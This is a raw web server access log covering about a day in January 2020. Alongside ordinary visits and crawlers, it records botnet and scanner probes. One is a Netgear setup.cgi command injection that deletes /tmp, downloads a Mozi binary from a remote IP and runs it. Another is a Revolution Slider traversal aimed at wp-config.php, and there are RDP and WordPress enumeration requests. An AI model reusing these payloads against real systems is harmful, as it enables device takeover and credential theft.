103.47.133.160 - - [15/Jan/2020:06:49:20 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
54.36.150.166 - - [15/Jan/2020:06:58:54 +0100] "GET /172-microsoft-pourrait-devoiler-la-surface-mini-le-20-mai HTTP/1.1" 404 136 "-" "Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)"
45.136.108.68 - - [15/Jan/2020:07:51:40 +0100] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 166 "-" "-"
124.13.133.165 - - [15/Jan/2020:08:07:30 +0100] "GET / HTTP/1.1" 400 166 "-" "-"
112.91.211.28 - - [15/Jan/2020:08:43:41 +0100] "GET / HTTP/1.1" 400 166 "-" "-"
2.183.127.108 - - [15/Jan/2020:08:53:07 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
54.36.148.0 - - [15/Jan/2020:08:57:40 +0100] "GET /182-google-demande-plusieurs-semaines HTTP/1.1" 404 136 "-" "Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)"
129.146.101.83 - - [15/Jan/2020:09:00:03 +0100] "GET / HTTP/1.0" 200 41 "-" "-"
91.216.213.189 - - [15/Jan/2020:09:18:18 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
191.205.236.130 - - [15/Jan/2020:09:20:10 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
142.93.113.182 - - [15/Jan/2020:09:36:00 +0100] "GET /wp-login.php HTTP/1.1" 404 136 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
213.159.213.236 - - [15/Jan/2020:09:42:40 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36"
175.140.99.192 - - [15/Jan/2020:10:08:55 +0100] "GET / HTTP/1.1" 400 166 "-" "-"
71.6.232.9 - - [15/Jan/2020:10:16:54 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
103.249.181.37 - - [15/Jan/2020:10:27:35 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
172.105.78.74 - - [15/Jan/2020:10:40:57 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.105.78.74 - - [15/Jan/2020:10:40:57 +0100] "\x16\x03\x01\x02\x00\x01\x00\x01\xFC\x03\x03\x0C\x0C\xAF\xAA\x12\x82P\xBE\x00\xE9\x04_\xAD\x0F\x97\x82\xA5u\x17T\xE4wt_;k\xF4%\xEA\xD17\xCA\x00\x00\x96\x13\x02\x13\x03\x13\x01\xC0,\xC00\xC0+\xC0/\xCC\xA9\xCC\xA8\x00\xA3\x00\x9F\x00\xA2\x00\x9E\xCC\xAA\xC0\xAF\xC0\xAD\xC0$\xC0(\xC0" 400 166 "-" "-"
124.13.118.188 - - [15/Jan/2020:10:46:31 +0100] "GET / HTTP/1.1" 400 166 "-" "-"
115.58.101.97 - - [15/Jan/2020:11:55:17 +0100] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://115.58.101.97:40598/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 162 "-" "-"
45.83.65.65 - - [15/Jan/2020:12:17:00 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0"
177.36.246.82 - - [15/Jan/2020:13:31:13 +0100] "GET / HTTP/1.1" 400 166 "-" "-"
189.226.243.227 - - [15/Jan/2020:14:18:19 +0100] "GET / HTTP/1.1" 400 166 "-" "-"
69.162.126.238 - - [15/Jan/2020:15:17:06 +0100] "HEAD /robots.txt HTTP/1.0" 404 0 "-" "-"
37.235.68.198 - - [15/Jan/2020:16:13:48 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
45.77.46.79 - - [15/Jan/2020:16:15:01 +0100] "GET / HTTP/1.1" 200 65 "-" "Go-http-client/1.1"
45.77.46.79 - - [15/Jan/2020:16:15:07 +0100] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 404 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
45.77.46.79 - - [15/Jan/2020:16:31:01 +0100] "GET /wp-content/plugins/iwp-client/clipboard.min.js HTTP/1.1" 404 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
45.77.46.79 - - [15/Jan/2020:16:31:01 +0100] "GET /wp-content/plugins/wp-time-capsule/js/opentip-jquery.js HTTP/1.1" 404 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
191.102.178.254 - - [15/Jan/2020:16:50:33 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36"
200.108.215.178 - - [15/Jan/2020:16:51:59 +0100] "GET / HTTP/1.1" 400 166 "-" "-"
78.85.36.38 - - [15/Jan/2020:17:47:51 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
151.74.24.123 - - [15/Jan/2020:18:19:06 +0100] "GET / HTTP/1.0" 200 41 "-" "-"
66.249.64.107 - - [15/Jan/2020:18:58:28 +0100] "GET /robots.txt HTTP/1.1" 404 136 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.109 - - [15/Jan/2020:18:58:28 +0100] "GET /ads.txt HTTP/1.1" 404 136 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
88.249.117.245 - - [15/Jan/2020:19:15:57 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
27.123.255.224 - - [15/Jan/2020:21:03:09 +0100] "GET /robots.txt HTTP/1.1" 404 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"
27.123.255.224 - - [15/Jan/2020:21:03:09 +0100] "GET /xmlrpc.php?rsd HTTP/1.1" 404 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"
27.123.255.224 - - [15/Jan/2020:21:03:09 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"
27.123.255.224 - - [15/Jan/2020:21:03:09 +0100] "GET /blog/robots.txt HTTP/1.1" 404 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"
27.123.255.224 - - [15/Jan/2020:21:03:10 +0100] "GET /blog/ HTTP/1.1" 404 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"
27.123.255.224 - - [15/Jan/2020:21:03:10 +0100] "GET /wordpress/ HTTP/1.1" 404 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"
27.123.255.224 - - [15/Jan/2020:21:03:11 +0100] "GET /wp/ HTTP/1.1" 404 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"
110.232.67.110 - - [15/Jan/2020:21:21:29 +0100] "GET / HTTP/1.1" 400 166 "-" "-"
89.46.29.0 - - [15/Jan/2020:21:37:30 +0100] "GET / HTTP/1.0" 200 41 "-" "-"
93.115.237.125 - - [15/Jan/2020:21:39:57 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
27.123.255.224 - - [15/Jan/2020:22:55:08 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
27.123.255.224 - - [15/Jan/2020:22:55:10 +0100] "GET /wp-login.php HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
27.123.255.224 - - [15/Jan/2020:22:55:13 +0100] "" 400 0 "-" "-"
177.32.230.208 - - [15/Jan/2020:23:26:46 +0100] "GET / HTTP/1.1" 400 166 "-" "-"
103.229.67.105 - - [15/Jan/2020:23:43:22 +0100] "GET /templets/lurd//lurd-add.htm HTTP/1.1" 404 162 "-" "libwww-perl/6.43"
27.123.255.224 - - [15/Jan/2020:23:44:37 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
27.123.255.224 - - [15/Jan/2020:23:44:57 +0100] "GET /wp-login.php HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
27.123.255.224 - - [15/Jan/2020:23:45:01 +0100] "" 400 0 "-" "-"
110.138.149.91 - - [15/Jan/2020:23:45:07 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
177.54.83.58 - - [15/Jan/2020:23:58:42 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
54.36.148.12 - - [16/Jan/2020:00:29:07 +0100] "GET /robots.txt HTTP/1.1" 404 136 "-" "Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)"
54.36.149.69 - - [16/Jan/2020:00:29:08 +0100] "GET /200-microsoft-presente-le-futur-windows-10 HTTP/1.1" 404 136 "-" "Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)"
149.28.46.11 - - [16/Jan/2020:01:31:06 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
149.28.46.11 - - [16/Jan/2020:01:31:28 +0100] "GET /wp-login.php HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
149.28.46.11 - - [16/Jan/2020:01:32:06 +0100] "GET /?author=1 HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
149.28.46.11 - - [16/Jan/2020:01:32:08 +0100] "GET /wp-json/wp/v2/users/ HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
149.28.46.11 - - [16/Jan/2020:01:32:40 +0100] "GET /wp-json/oembed/1.0/embed?url=http://cfpt.info HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
149.28.46.11 - - [16/Jan/2020:01:32:46 +0100] "POST /xmlrpc.php HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
211.176.125.70 - - [16/Jan/2020:01:35:25 +0100] "GET / HTTP/1.0" 200 41 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Trident/6.0)"
186.4.116.83 - - [16/Jan/2020:03:25:46 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
213.202.253.44 - - [16/Jan/2020:04:54:36 +0100] "GET /robots.txt HTTP/1.1" 404 162 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
213.202.253.44 - - [16/Jan/2020:04:54:40 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
213.202.253.44 - - [16/Jan/2020:04:54:49 +0100] "GET /robots.txt HTTP/1.1" 404 162 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
213.202.253.44 - - [16/Jan/2020:04:54:53 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
85.9.95.138 - - [16/Jan/2020:05:23:42 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
159.203.193.246 - - [16/Jan/2020:06:00:55 +0100] "GET /manager/text/list HTTP/1.1" 404 136 "-" "Mozilla/5.0 zgrab/0.x"
54.36.148.74 - - [16/Jan/2020:06:12:53 +0100] "GET /index.php HTTP/1.1" 404 136 "-" "Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)"
